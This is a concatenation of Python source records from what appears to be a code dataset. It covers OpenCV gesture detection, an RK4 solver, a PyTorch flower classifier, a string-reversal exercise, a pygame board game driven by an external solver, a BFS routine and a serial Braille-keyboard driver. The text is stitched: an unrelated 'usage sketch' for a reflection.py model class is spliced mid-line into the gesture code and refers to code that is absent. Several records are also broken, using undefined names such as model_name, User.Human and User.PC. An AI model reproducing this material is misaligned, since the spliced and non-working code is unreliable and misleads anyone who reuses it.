h,s,v1=cv.split(res)\n res=v1\n 
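# Usage sketch for the reflection.py record above: metamodelclass reads the
# class __annotations__, keeps the entries that are Field instances, and
# registers a ModelClass for them. Player and its fields are illustrative and
# assume the Field base __init__ accepts the (iscomputed, iskey) arguments the
# subclasses shown above forward to it.
@metamodelclass
class Player(ModelObject):
    score: FloatField(iskey=True)
    active: BoolField()
    role: EnumField(values=['host', 'guest'])

p = Player()
p.score, p.active, p.role = 10.0, True, 'host'
p.check()    # runs each declared field's check() and logs any errors
print(p)     # __str__ delegates to ModelClass.model_str via ModelDict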
res=res.astype(np.uint8)\n \n \n #finding and drawing contours \n contour,hierarchy= cv.findContours(res,cv.RETR_TREE,cv.CHAIN_APPROX_SIMPLE)\n max_ct=max(contour, key = lambda x: cv.contourArea(x))\n epsilon = 0.00001*cv.arcLength(max_ct,True)\n c= cv.approxPolyDP(max_ct,epsilon,True)\n cv.drawContours(roi, c, -1, (255, 0, 255), 2)\n \n #finding extreme points of the contour\n l = tuple(c[c[:, :, 0].argmin()][0])\n r = tuple(c[c[:, :, 0].argmax()][0])\n top = tuple(c[c[:, :, 1].argmin()][0])\n \n #centroid of the contour\n M = cv.moments(max_ct)\n cx = int(M['m10']/M['m00'])\n cy = int(M['m01']/M['m00'])\n cntr=(cx,cy)\n \n #classification of gestures based on dist between points of contour\n font = cv.FONT_HERSHEY_SIMPLEX\n area=cv.contourArea(max_ct)\n cv.putText(frame, 'Gesture : ', (260, 35), font, 1, (255, 0, 0), 1)\n if dist(top,cntr)>110 and dist(l,cntr)<90:\n cv.putText(frame, 'UP', (430, 35), font, 1 ,(255, 255, 0), 2)\n elif dist(top,cntr)<90 and dist(r,cntr)>100:\n cv.putText(frame, 'RIGHT', (430, 35), font, 1, (0, 255, 0), 2)\n elif dist(top,cntr)>110 and dist(l,cntr)>100:\n cv.putText(frame, 'LEFT', (430, 35), font, 1, (255, 0, 255), 2)\n elif dist(top,cntr)<110 and dist(l,cntr)<100 and dist(r,cntr)<90:\n cv.putText(frame, 'DOWN', (430, 35), font, 1, (0, 255, 255), 2)\n\n cv.imshow('res',res) \n cv.imshow('img',frame)\n \n cv.circle(roi, l, 8, (0, 0, 255), -1)\n cv.circle(roi, r, 8, (0, 255, 0), -1)\n cv.circle(roi, top, 8, (255, 0, 0), -1)\n cv.circle(roi, cntr, 8, (0, 255, 255), -1)\n \n \n \n cv.imshow(\"roi\",roi)\n if cv.waitKey(40) == 27: # Esc to quit the video windows\n break\n\ncv.destroyAllWindows()\ncap.release() \n","sub_path":"OpenCV_exercises/Gesture_recognition/hand_gesture_krithik.py","file_name":"hand_gesture_krithik.py","file_ext":"py","file_size_in_byte":2959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"567476634","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ndef rk4(h,x,deriv,result,k1):\n '''\n y: an (n x dim) array with n the order of the ODE and dim the dimension\n np.array([[y1' y2' y3'],\n [y1 y2 y3]])\n result: a list of all the y arrays\n k1: the first evaluation\n deriv: the evaluation function f(x,y)\n '''\n yn = result[-1] #the last array, which represents the position\n mid_x = x + 0.5 * h\n \n k2 = deriv(mid_x, yn + 0.5 * h * k1)\n k3 = deriv(mid_x, yn + 0.5 * h * k2)\n k4 = deriv(x + h, yn + h* k3)\n result.append(yn + h / 6 * (k1 + 2*k2 + 2*k3 + k4))\n\n\ndef rk4_driver(init_x, final_x, init_y, step_number, deriv):\n '''\n y: an (n x dim) array with n the order of the ODE and dim the dimension\n np.array([[y1' y2' y3'],\n [y1 y2 y3]])\n result: a list of all the y's. 
[y1,y2,y3...]\n k1: the first evaluation\n deriv: the evaluation function f(x,y)\n '''\n result = [init_y]\n x_list = [init_x]\n h = (final_x - init_x) / step_number\n x = init_x\n for k in range(step_number):\n k1 = deriv(x, result[-1])\n rk4(h, x, deriv, result, k1)\n x += h\n x_list.append(x)\n return result, x_list\n\n\nif (__name__ == \"__main__\"):\n init_x = 0\n final_x = 1\n init_y = np.array([[1,0]])\n step_number = 10\n result, x_list = rk4_driver(init_x, final_x, init_y, step_number, lambda x, y : -np.linalg.norm(y[-1])**3 * y[-1]) \n fig = plt.figure(dpi = 160)\n ax = fig.add_subplot(\"111\")\n print(result)\n #ax.plot(x_list ,[a[0] for a in result])\n #ax.set_yscale('log')\n\n\n\n\n \n ","sub_path":"tutorial03/exercise03_1_Boxi.py","file_name":"exercise03_1_Boxi.py","file_ext":"py","file_size_in_byte":1641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"169991940","text":"\r\n# coding: utf-8\r\n\r\n# In[1]:\r\n\r\n\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.optim as optim\r\nimport torch.optim.lr_scheduler as lr_scheduler\r\nimport torch.utils.data as data\r\nimport torchvision.models as models\r\nimport torchvision.transforms as transforms\r\nimport torchvision.datasets as datasets\r\nimport time\r\nimport copy\r\nimport argparse\r\nimport os\r\nfrom PIL import Image\r\nimport numpy as np\r\nimport json\r\nfrom torch.autograd import Variable\r\nimport torch.nn.functional as F\r\nimport matplotlib.image as mpimg\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\n# In[2]:\r\n\r\n\r\ndef load_model(checkpoint_path, arch , num_classes=102):\r\n\r\n\r\n\r\n if model_name == \"resnet\":\r\n \"\"\" Resnet18\r\n \"\"\"\r\n model_ft = models.resnet18(pretrained=\"imagenet\")\r\n set_parameter_requires_grad(model_ft, feature_extract)\r\n num_ftrs = model_ft.fc.in_features\r\n model_ft.fc = nn.Linear(num_ftrs, num_classes)\r\n input_size = 224\r\n\r\n elif model_name == \"alexnet\":\r\n \"\"\" Alexnet\r\n \"\"\"\r\n model_ft = models.alexnet(pretrained=\"imagenet\")\r\n set_parameter_requires_grad(model_ft, feature_extract)\r\n num_ftrs = model_ft.classifier[6].in_features\r\n model_ft.classifier[6] = nn.Linear(num_ftrs,num_classes)\r\n input_size = 224\r\n\r\n elif model_name == \"vgg\":\r\n \"\"\" VGG11_bn\r\n \"\"\"\r\n model_ft = models.vgg11_bn(pretrained=\"imagenet\")\r\n set_parameter_requires_grad(model_ft, feature_extract)\r\n num_ftrs = model_ft.classifier[6].in_features\r\n model_ft.classifier[6] = nn.Linear(num_ftrs,num_classes)\r\n input_size = 224\r\n\r\n elif model_name == \"squeezenet\":\r\n \"\"\" Squeezenet\r\n \"\"\"\r\n model_ft = models.squeezenet1_0(pretrained=\"imagenet\")\r\n set_parameter_requires_grad(model_ft, feature_extract)\r\n model_ft.classifier[1] = nn.Conv2d(512, num_classes, kernel_size=(1,1), stride=(1,1))\r\n model_ft.num_classes = num_classes\r\n input_size = 224\r\n\r\n elif model_name == \"densenet\":\r\n \"\"\" Densenet\r\n \"\"\"\r\n model_ft = models.densenet121(pretrained=\"imagenet\")\r\n set_parameter_requires_grad(model_ft, feature_extract)\r\n num_ftrs = model_ft.classifier.in_features\r\n model_ft.classifier = nn.Linear(num_ftrs, num_classes)\r\n input_size = 224\r\n\r\n elif model_name == \"inception\":\r\n \"\"\" Inception v3\r\n Be careful, expects (299,299) sized images and has auxiliary output\r\n \"\"\"\r\n model_ft = models.inception_v3(pretrained=\"imagenet\")\r\n set_parameter_requires_grad(model_ft, feature_extract)\r\n # Handle the auxilary 
net\r\n num_ftrs = model_ft.AuxLogits.fc.in_features\r\n model_ft.AuxLogits.fc = nn.Linear(num_ftrs, num_classes)\r\n # Handle the primary net\r\n num_ftrs = model_ft.fc.in_features\r\n model_ft.fc = nn.Linear(num_ftrs,num_classes)\r\n input_size = 299\r\n\r\n else:\r\n print(\"Invalid model name, exiting...\")\r\n exit()\r\n\r\n chpt = torch.load(checkpoint_path)\r\n model.class_to_idx = chpt['class_to_idx']\r\n model.load_state_dict(chpt['state_dict'])\r\n\r\n\r\n return model\r\n\r\n# In[3]:\r\n\r\n\r\ndef train_model(model, epochs, learning_rate, device , image_path):\r\n\r\n\r\n\r\n since =time.time()\r\n criterion = nn.CrossEntropyLoss()\r\n optimizer= optim.SGD(model.parameters(), lr=0.001, momentum = 0.95, weight_decay = 0.01, nesterov =True)\r\n\r\n scheduler = lr_scheduler.StepLR(optimizer, step_size=7, gamma=0.1)\r\n best_acc = 0.0\r\n\r\n\r\n\r\n\r\n print('Number of epochs:', epochs)\r\n print('Learning rate:', learning_rate)\r\n\r\n\r\n\r\n\r\n for epoch in range(epochs):\r\n\r\n print('Epoch {}/{}'.format(epoch, epochs - 1))\r\n print('-' * 10)\r\n\r\n\r\n for phase in ['train','valid']:\r\n if phase == 'train':\r\n scheduler.step()\r\n model.train()\r\n else:\r\n model.eval()\r\n running_loss = 0.0\r\n running_corrects = 0\r\n corrects = 0\r\n\r\n\r\n\r\n for inputs, labels in dataloaders[phase]:\r\n\r\n model.to(device)\r\n inputs = inputs.to(device)\r\n labels = labels.to(device)\r\n optimizer.zero_grad()\r\n\r\n with torch.set_grad_enabled(phase == 'train'):\r\n outputs = model(inputs)\r\n _, preds = torch.max(outputs, 1)\r\n loss = criterion(outputs, labels)\r\n\r\n\r\n if phase == 'train':\r\n loss.backward()\r\n optimizer.step()\r\n\r\n running_loss += loss.item() * inputs.size(0)\r\n running_corrects += torch.sum(preds == labels.data)\r\n\r\n\r\n epoch_loss = running_loss / dataset_sizes[phase]\r\n epoch_acc = running_corrects.double() / dataset_sizes[phase]\r\n\r\n print('{} Loss: {:.4f} Acc: {:.4f}'.format(phase, epoch_loss, epoch_acc))\r\n\r\n if phase == 'valid' and epoch_acc > best_acc:\r\n best_acc = epoch_acc\r\n best_model_wts = copy.deepcopy(model.state_dict())\r\n\r\n\r\n print()\r\n time_elapsed = time.time() - since\r\n print('Training complete in {:.0f}m {:.0f}s'.format(\r\n time_elapsed // 60, time_elapsed % 60))\r\n print('Best val Acc: {:4f}'.format(best_acc))\r\n\r\n model.load_state_dict(best_model_wts)\r\n\r\n\r\n return model\r\n\r\n\r\n# In[4]:\r\n\r\n\r\ndef check_accuracy_on_test(testloader, checkpoint_path, loaded_model):\r\n correct = 0\r\n total = 0\r\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\r\n model =loaded_model\r\n model.cuda()\r\n\r\n\r\n with torch.no_grad():\r\n for data in testloader:\r\n images, labels = data\r\n images= images.to(device)\r\n labels = labels.to(device)\r\n chpt = torch.load(checkpoint_path)\r\n model.class_to_idx = chpt['class_to_idx']\r\n model.load_state_dict(chpt['state_dict'])\r\n model.eval()\r\n outputs = model(images)\r\n _, predicted = torch.max(outputs.data, 1)\r\n total += labels.size(0)\r\n correct += (predicted == labels).sum().item()\r\n\r\n print('Accuracy of the network on the test images: %d %%' % (100 * correct / total))\r\n\r\n\r\n# In[5]:\r\n\r\n\r\ndef process_image(image_test):\r\n ''' Scales, crops, and normalizes a PIL image for a PyTorch model,\r\n returns an Numpy array'''\r\n img_loader = transforms.Compose([\r\n transforms.Resize(256),\r\n transforms.CenterCrop(224),\r\n transforms.ToTensor()])\r\n\r\n pil_image = Image.open(image_test)\r\n pil_image = 
img_loader(pil_image).float()\r\n\r\n tensor_image = np.array(pil_image)\r\n\r\n mean = np.array([0.485, 0.456, 0.406])\r\n std = np.array([0.229, 0.224, 0.225])\r\n tensor_image = (np.transpose(tensor_image, (1, 2, 0)) - mean)/std\r\n tensor_image = np.transpose(tensor_image, (2, 0, 1))\r\n\r\n\r\n return tensor_image\r\n\r\n\r\n# In[6]:\r\n\r\n\r\n\r\ndef imshow(image, ax=None, title=None):\r\n if ax is None:\r\n fig, ax = plt.subplots()\r\n if title:\r\n plt.title(title)\r\n # PyTorch tensors assume the color channel is first\r\n # but matplotlib assumes is the third dimension\r\n image = image.transpose((1, 2, 0))\r\n\r\n # Undo preprocessing\r\n mean = np.array([0.485, 0.456, 0.406])\r\n std = np.array([0.229, 0.224, 0.225])\r\n image = std * image + mean\r\n\r\n # Image needs to be clipped between 0 and 1\r\n image = np.clip(image, 0, 1)\r\n\r\n ax.imshow(image)\r\n\r\n return ax\r\n\r\n# In[7]:\r\n\r\n\r\ndef predict(image_test,model,checkpoint_path, topk = 5):\r\n\r\n\r\n\r\n image = process_image(image_test)\r\n image_tensor = torch.from_numpy(image).type(torch.FloatTensor)\r\n input= image_tensor.unsqueeze(0)\r\n\r\n\r\n\r\n chpt = torch.load(checkpoint_path)\r\n\r\n model.class_to_idx = chpt['class_to_idx']\r\n model.load_state_dict(chpt['state_dict'])\r\n model.cpu()\r\n model.eval()\r\n probs = torch.exp(model.forward(input))\r\n top_probs, top_labs = probs.topk(topk)\r\n top_probs = top_probs.detach().numpy().tolist()[0]\r\n top_labs = top_labs.detach().numpy().tolist()[0]\r\n\r\n idx_to_class = {val: key for key, val in model.class_to_idx.items()}\r\n\r\n top_labels = [idx_to_class[lab] for lab in top_labs]\r\n top_flowers = [cat_to_name[idx_to_class[lab]] for lab in top_labs]\r\n return top_probs, top_labels, top_flowers\r\n\r\n\r\n\r\n# In[8]:\r\n\r\n\r\n\r\ndef sanity_check(image_test):\r\n img = mpimg.imread(image_test)\r\n plt.rcdefaults()\r\n plt.figure(figsize = (6,10))\r\n ax = plt.subplot(2,1,1)\r\n flower_num = image_test.split('\\\\')[6]\r\n title_ = cat_to_name[flower_num]\r\n img = process_image(image_test)\r\n imshow(img, ax, title = title_)\r\n\r\n probs, labs, flowers= predict(image_test, loaded_model,checkpoint_path, topk=5)\r\n\r\n\r\n\r\n plt.subplot(2,1,2)\r\n sns.barplot(x=probs, y=flowers, color=sns.color_palette()[0]);\r\n plt.show()\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n\r\n image_path = \"C://Users//Sahan//ipthw//flowers\"\r\n\r\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\r\n\r\n print(device)\r\n\r\n\r\n\r\n with open('C:\\\\Users\\\\sahan\\\\ipthw\\\\cat_to_name.json', 'r') as f:\r\n cat_to_name = json.load(f)\r\n\r\n data_transforms = {\r\n 'train': transforms.Compose([\r\n transforms.RandomRotation(45),\r\n transforms.RandomResizedCrop(224),\r\n transforms.RandomHorizontalFlip(),\r\n transforms.ToTensor(),\r\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\r\n ]),\r\n 'valid': transforms.Compose([\r\n transforms.Resize(256),\r\n transforms.CenterCrop(224),\r\n transforms.ToTensor(),\r\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\r\n ]),\r\n 'test': transforms.Compose([\r\n transforms.Resize(256),\r\n transforms.CenterCrop(224),\r\n transforms.ToTensor(),\r\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\r\n ])}\r\n\r\n\r\n\r\n image_datasets = {x: datasets.ImageFolder(os.path.join(image_path, x),data_transforms[x]) for x in ['train', 'valid','test']}\r\n dataloaders = {x: 
torch.utils.data.DataLoader(image_datasets[x], batch_size=1,shuffle=True, num_workers=0) for x in ['train', 'valid','test']}\r\n dataset_sizes = {x: len(image_datasets[x]) for x in ['train', 'valid','test']}\r\n class_names = image_datasets['train'].classes\r\n\r\n\r\n\r\n arch = 'Densenet-161'\r\n\r\n epochs=25\r\n learning_rate =0.001\r\n\r\n\r\n checkpoint_path = 'Densenet-161(test15).pth.tar'\r\n loaded_model =load_model(checkpoint_path, arch , num_classes=102)\r\n\r\n trained_model =train_model(loaded_model, epochs, learning_rate, device, image_path)\r\n\r\n trained_model.class_to_idx = image_datasets['train'].class_to_idx\r\n checkpoint = {\r\n 'arch': arch,\r\n 'class_to_idx': trained_model.class_to_idx,\r\n 'state_dict': trained_model.state_dict(),\r\n 'hidden_units':1000}\r\n\r\n torch.save(checkpoint, 'Densenet-161(test16).pth.tar')\r\n checkpoint_path = 'Densenet-161(Test16).pth.tar'\r\n image_test = 'C:\\\\Users\\\\sahan\\\\ipthw\\\\flowers\\\\train\\\\10\\\\image_07087.jpg'\r\n\r\n check_accuracy_on_test(dataloaders['test'], checkpoint_path,loaded_model)\r\n\r\n top_probs, top_labels, top_flowers =predict(image_test,loaded_model, checkpoint_path, topk=5)\r\n sanity_check(image_test)\r\n","sub_path":"classifier.py","file_name":"classifier.py","file_ext":"py","file_size_in_byte":11672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"302188108","text":"'''\r\nCreated on 21 mar. 2020\r\n\r\n@author: Sidney\r\n\r\nEscribir un programa que pida al usuario una palabra y luego muestre\r\npor pantalla una a una las letras de la palabra introducida empezando\r\npor la última.\r\n\r\nhttp://aprendeconalf.es/python/ejercicios/bucles.html\r\n\r\n'''\r\n\r\na = input(\"Introduce una palabra: \")\r\n\r\nfor i in reversed(a):\r\n print(i)","sub_path":"ejerciciosALF_bucles/main10.py","file_name":"main10.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"241316926","text":"from enum import Enum\nfrom os import system\nfrom threading import Thread\nimport numpy as np\nimport pygame, time\nfrom pygame.locals import *\npygame.init()\n\nclass Mode(Enum):\n Select = 1\n Rotate = 2\n Solve = 3\n\nclass User(Enum):\n Null = 0\n PC1 = 1\n PC2 = 2\n\nSOLVER = \"solvers/hashsolver.o\"\n\ndef draw():\n disp.fill((0,150,255))\n pygame.draw.line(disp, (0,0,0), (W//2,0), (W//2,W), 5)\n pygame.draw.line(disp, (0,0,0), (0,W//2), (W,W//2), 5)\n for i in range(6):\n for j in range(6):\n q = board[i,j]\n pygame.draw.circle(disp, cmap[q], (ax[i],ay[j]), r)\n\ndef rotdraw():\n w, h = rimg.get_size()\n for i in range(2):\n for j in range(2):\n x1 = rx[i*2]\n x2 = rx[i*2+1]\n y = ry[j]\n disp.blit(limg, (x1-w//2,y-h//2))\n disp.blit(rimg, (x2-w//2,y-h//2))\n\ndef getcell(xm, ym):\n dx = (ax - xm)**2\n dy = (ay - ym)**2\n for i in range(6):\n for j in range(6):\n if dx[i] + dy[j] <= r**2 and board[i,j] == User.Null:\n return i,j\n return None\n\ndef getrot(xm, ym):\n w, h = rimg.get_size()\n for i in range(2):\n for j in range(2):\n x1 = rx[i*2]\n x2 = rx[i*2+1]\n y = ry[j]\n if y-h//2 <= ym <= y+h//2:\n if x1-w//2 <= xm <= x1+w//2:\n return i,j,+1\n if x2-w//2 <= xm <= x2+w//2:\n return i,j,-1\n return None\n\ndef solve(cur):\n global board, points, last\n\n cp = np.zeros((6, 6), dtype=str)\n cp[board==User.Null] = '_'\n if cur == User.PC1:\n cp[board==User.PC1] = 'X'\n cp[board==User.PC2] = 'O'\n else:\n cp[board==User.PC2] = 'X'\n cp[board==User.PC1] = 'O'\n 
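# solve() in the pc2pc.py record above serialises the 6x6 User board to the
# 'X'/'O'/'_' characters the external solver expects and parses them back. A
# self-contained round-trip of just that encoding (dtype=object is used here
# for the enum-valued array; the record itself passes dtype=User):
import numpy as np
from enum import Enum

class User(Enum):
    Null = 0
    PC1 = 1
    PC2 = 2

board = np.full((6, 6), User.Null, dtype=object)
board[0, 0], board[5, 5] = User.PC1, User.PC2

cp = np.full((6, 6), '_', dtype=str)
cp[board == User.PC1] = 'X'
cp[board == User.PC2] = 'O'
assert cp[0, 0] == 'X' and cp[5, 5] == 'O' and cp[1, 1] == '_'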
np.savetxt(\"log/in.txt\", cp, fmt = '%s', delimiter=' ')\n\n cmd = \"./\" + SOLVER + \"< ./log/in.txt > ./log/out.txt\"\n system(cmd)\n\n file = open(\"log/out.txt\", \"r\")\n data = file.readlines()\n points = list(map(int, data[0].split()))\n for i in range(1, 7):\n cp = np.array(data[i].split(), dtype=str)\n board[i-1, cp=='_'] = User.Null\n if cur == User.PC1:\n board[i-1, cp=='X'] = User.PC1\n board[i-1, cp=='O'] = User.PC2\n else:\n board[i-1, cp=='X'] = User.PC2\n board[i-1, cp=='O'] = User.PC1\n return\n\ndef wait():\n pygame.draw.circle(disp, (255,0,0), (W//2, W//2), 50)\n pygame.display.update()\n time.sleep(1)\n\ncmap = {User.Null : (0,0,200),\n User.PC1 : (255,255,255),\n User.PC2: (0,0,0)}\n\nW = 600\nr = 30\nrimg = pygame.image.load(\"img/iright.png\")\nlimg = pygame.image.load(\"img/ileft.png\")\ndisp = pygame.display.set_mode((W, W))\nfont = pygame.font.Font(None, 128)\nclock = pygame.time.Clock()\n\nboard = np.zeros((6,6), dtype=User)\nboard[:][:] = User.Null\nlast = None\nax = np.linspace(0, W, 13, dtype=np.int32)[1:-1:2]\nay = np.linspace(0, W, 13, dtype=np.int32)[1:-1:2]\nrx = np.linspace(0, W, 7, dtype=np.int32)[[1,2,4,5]]\nry = np.linspace(0, W, 5, dtype=np.int32)[[1,3]]\n\ndraw()\npygame.display.update()\n\nnow = Mode.Solve\ncurrent = User.PC1\npoints = [0, 0, 0]\nrunning = True\n\nwhile running:\n if sum(points) > 0:\n running = False\n break\n\n for e in pygame.event.get():\n if e.type == QUIT:\n running = False\n\n if e.type == MOUSEMOTION and now == Mode.Select:\n xm, ym = e.pos\n ind = getcell(xm, ym)\n if ind is not None:\n i, j = ind\n pygame.draw.circle(disp, cmap[current], (ax[i], ay[j]), r)\n else:\n draw()\n\n if e.type == MOUSEBUTTONDOWN and now == Mode.Select:\n xm, ym = e.pos\n ind = getcell(xm, ym)\n if ind is not None:\n last = board.copy()\n i, j = ind\n board[i, j] = User.Human\n now = Mode.Rotate\n rotdraw()\n break\n\n if e.type == MOUSEBUTTONDOWN and now == Mode.Rotate:\n xm, ym = e.pos\n ind = getrot(xm, ym)\n if ind is not None:\n i, j, k = ind\n pl = i + j*2\n q = board[i*3:(i+1)*3, j*3:(j+1)*3]\n q[:] = np.rot90(q, -k)\n now = Mode.Solve\n current = User.PC\n draw()\n\n if e.type == KEYDOWN:\n if e.key == K_z and last is not None:\n board[:] = last\n\n pygame.display.update()\n\n if current != User.Null and now == Mode.Solve:\n thr = Thread(target=solve, args=(current,))\n thr.start()\n wait()\n thr.join()\n if current == User.PC1:\n current = User.PC2\n else:\n current = User.PC1\n now = Mode.Solve\n draw()\n\n pygame.display.update()\n\n clock.tick(60)\n\ntext = 'null'\nprint(points)\nif (points[0] == points[1] and points[0] != 0) or points[2] == 1:\n text = \"draw\"\nelif points[0] > points[1]:\n text = \"PC1 wins\"\nelif points[1] > points[0]:\n text = \"PC2 wins\"\nelse:\n text = \"Press again\"\n\nbox = font.render(text, True, (255,128,0))\nwb, hb = box.get_size()\ndisp.blit(box, ((W-wb)//2, (W-hb)//2))\npygame.display.update()\nprint(\"End of Game, Press Quit Button!\")\n\nwhile True:\n for e in pygame.event.get():\n if e.type == QUIT:\n pygame.quit()\n","sub_path":"pc2pc.py","file_name":"pc2pc.py","file_ext":"py","file_size_in_byte":5351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"522859158","text":"\ntest_graph = {1: set([2,3]),\n 2: set([4,5,6]),\n 3: set([7]),\n 4: set([1]),\n 5: set([2,5]),\n 6: set([8]),\n 7: set([3]),\n 8: set([2,3])\n }\n\ndef bfs_iteration(graph, root):\n visited = []\n queue = [root]\n while queue:\n now = queue.pop(0)\n if now not in visited:\n 
visited.append(now)\n queue.extend(graph[now])\n return visited","sub_path":"basic_code/bfs.py","file_name":"bfs.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"92351960","text":"import time\nimport serial\nimport serial.tools.list_ports\nimport struct\n\nclass keyboard:\n \"\"\" Object that communicates between the\n braillecade keyboard and the computer.\n \"\"\"\n\n def __init__(self):\n \"\"\"\n self.Ser: serial object?\n\n self.last_button_state:\n\n self.last_chord:\n\n self.last_letter:\n \"\"\"\n\n self.ser = None\n\n\n self.standard = None\n self.raw = None\n self.chord = None\n self.letter = None\n self.cursor_key = None\n self.cursor_key_list = None\n self.card_state = None\n self.card_trigger = None\n self.card_str = ' '\n self.card_ID = None\n \n\n self.last_chord = None\n\n self.last_letter = None\n\n self.comport = None\n \n \n self.chord_to_letter = {\n '000001': 'a',\n '000011': 'b',\n '001001': 'c',\n '011001': 'd',\n '010001': 'e',\n '001011': 'f',\n '011011': 'g',\n '010011': 'h',\n '001010': 'i',\n '011010': 'j',\n '000101': 'k',\n '000111': 'l', \n '001101': 'm',\n '011101': 'n',\n '010101': 'o',\n '001111': 'p',\n '011111': 'q',\n '010111': 'r',\n '001110': 's',\n '011110': 't',\n '100101': 'u',\n '100111': 'v',\n '111010': 'w',\n '101101': 'x',\n '111101': 'y',\n '110101': 'z',\n '000000': None,\n }\n\n self.letter_to_chord = {\n 'a':'000001',\n 'b':'000011', \n 'c':'001001',\n 'd':'011001',\n 'e':'010001',\n 'f':'001011',\n 'g':'011011',\n 'h':'010011',\n 'i':'001010',\n 'j':'011010',\n 'k':'000101',\n 'l':'000111',\n 'm':'001101',\n 'n':'011101',\n 'o':'010101',\n 'p':'001111',\n 'q':'011111',\n 'r':'010111',\n 's':'001110',\n 't':'011110',\n 'u':'100101',\n 'v':'100111',\n 'w':'111010',\n 'x':'101101',\n 'y':'111101',\n 'z':'110101',\n 'space':'000000',\n }\n\n self.chord_to_key = {\n '000001': 'key1',\n '000010': 'key2',\n '000100': 'key3',\n '001000': 'key4',\n '010000': 'key5',\n '100000': 'key6',\n }\n\n self.key_to_chord = {\n 'key1':'000001',\n 'key2':'000010',\n 'key3':'000100',\n 'key4':'001000',\n 'key5':'010000',\n 'key6':'100000',\n }\n\n \n def list_coms(self):\n \"\"\" Returns a list of communication ports available\n \"\"\"\n \n comports = list(serial.tools.list_ports.comports())\n\n port_numbers = []\n\n for port_no, description, address in comports:\n port_numbers.append(port_no)\n \n return port_numbers\n\n\n def test_coms(self):\n \"\"\"\n \"\"\"\n\n port_numbers = self.list_coms()\n\n if len(port_numbers) > 0:\n for port in port_numbers: # don't use i\n print(\"testing {}\".format(port)) \n self.ser = serial.Serial(port,baudrate=9600,timeout=0)\n time.sleep(.5)\n self.ser.write(b\"i\")\n time.sleep(.5)\n out = ''\n \n while self.ser.inWaiting() > 0:\n out += self.ser.read(1).decode('utf-8')\n\n if out != '':\n print(\">>{}\".format(out))\n\n if out == 'BrailleCade':\n print('Braillecade Found')\n self.com_port = port\n break # does this need to be a return\n\n self.ser.close\n\n print(\"No comports found\")\n\n\n def update_keyboard(self):\n \"\"\"\n \"\"\"\n\n self.ser.write(b'b')\n time.sleep(.1)\n\n if self.ser.inWaiting() > 0:\n\n self.raw = format(int.from_bytes(self.ser.readline(),'little'),'032b')\n\n self.card_trigger = False\n\n if self.raw == '11111111111111111111111111111111':\n\n self.request_card()\n self.card_trigger = True\n \n self.raw = '00000000000000000000000000000000'\n\n if self.raw == '10101010101010101010101010101010':\n 
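# Usage sketch for the bfs record above: traversal order from node 1. The
# adjacency values are sets, so ordering within a level is not guaranteed,
# but every reachable node appears exactly once.
order = bfs_iteration(test_graph, 1)
print(order)                            # e.g. [1, 2, 3, 4, 5, 6, 7, 8]
assert set(order) == set(test_graph)    # all eight nodes visited once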
self.card_state = False\n                self.card_str = ' '\n                self.card_ID = None\n\n                self.raw = '00000000000000000000000000000000'\n\n\n            self.chord = self.raw[2:8]\n            self.letter = self.get_letter(self.chord)\n            self.key = self.get_key(self.chord)\n\n            try:\n                self.cursor_key = 19 - self.raw[12:32].index('1')\n            except ValueError:\n                # no cursor key bit is set in this state word\n                self.cursor_key = None\n\n            self.cursor_keys_list = [(19 - pos) for pos,char in enumerate(self.raw[12:32]) if char == '1']\n\n\n            if ((self.raw[0] == '1') & (self.raw[1] == '1') & (self.raw[8] == '1')):\n                self.standard = 'quit'\n            elif self.raw[8] == '1':\n                self.standard = 'space'\n                self.letter = 'space' # is this right? space is higher priority than a letter?\n            elif ((self.raw[0] == '1') & (self.raw[1] == '1')):\n                self.standard = 'display'\n            elif (self.raw[0] == '1'):\n                self.standard = 'newline'\n            elif (self.raw[1] == '1'):\n                self.standard = 'backspace'\n            elif self.letter:\n                self.standard = self.letter\n            elif self.cursor_key is not None:\n                self.standard = self.cursor_key\n            else:\n                self.standard = None\n\n        return {\n            'raw':self.raw,\n            'card_trigger':self.card_trigger,\n            'chord':self.chord,\n            'letter':self.letter,\n            'cursor_key':self.cursor_key,\n            'cursor_keys_list':self.cursor_keys_list,\n            'standard':self.standard,\n            'card_state':self.card_state,\n            'card_str':self.card_str,\n            'key':self.key,\n            'card_ID':self.card_ID\n        }\n\n\n    def get_letter(self, chord):\n\n        return self.chord_to_letter.get(chord, 'error')\n\n    def get_key(self, chord):\n\n        return self.chord_to_key.get(chord, None)\n\n\n    def request_card(self):\n        \"\"\" Sends a request to the keyboard for the data on the card.\n            Returns this data as a string.\n        \"\"\"\n\n        self.ser.write(b'c')\n        time.sleep(.1)\n\n        temp_string = self.ser.readline().decode('ascii')\n        self.card_str = temp_string[1:-2]\n        self.card_ID = temp_string[0]\n\n        print(self.card_str)\n\n        self.card_state = True\n\n        return(self.card_str)\n\n\n    def vibrate_single_key(self, vib):\n\n        counter = 0\n\n        for digit in self.key_to_chord[vib][::-1]: # switch order of string since MSB and LSB are switching when reading left to right.\n            if digit == '1':\n                vib = pow(2, counter)\n                self._vibrate_key(vib)\n                print(vib)\n                time.sleep(.01)\n                self.ser.reset_input_buffer()\n            counter += 1\n\n\n    def _vibrate_key(self, vib, sleep_time=0.05):\n        \"\"\" Pulse the motors in the given bitmask, then switch them all off.\n        \"\"\"\n\n        self.ser.write(b'v')\n        self.ser.write(str(vib).encode('ascii'))\n        self.ser.write(b'\\r')\n\n        time.sleep(sleep_time)\n\n        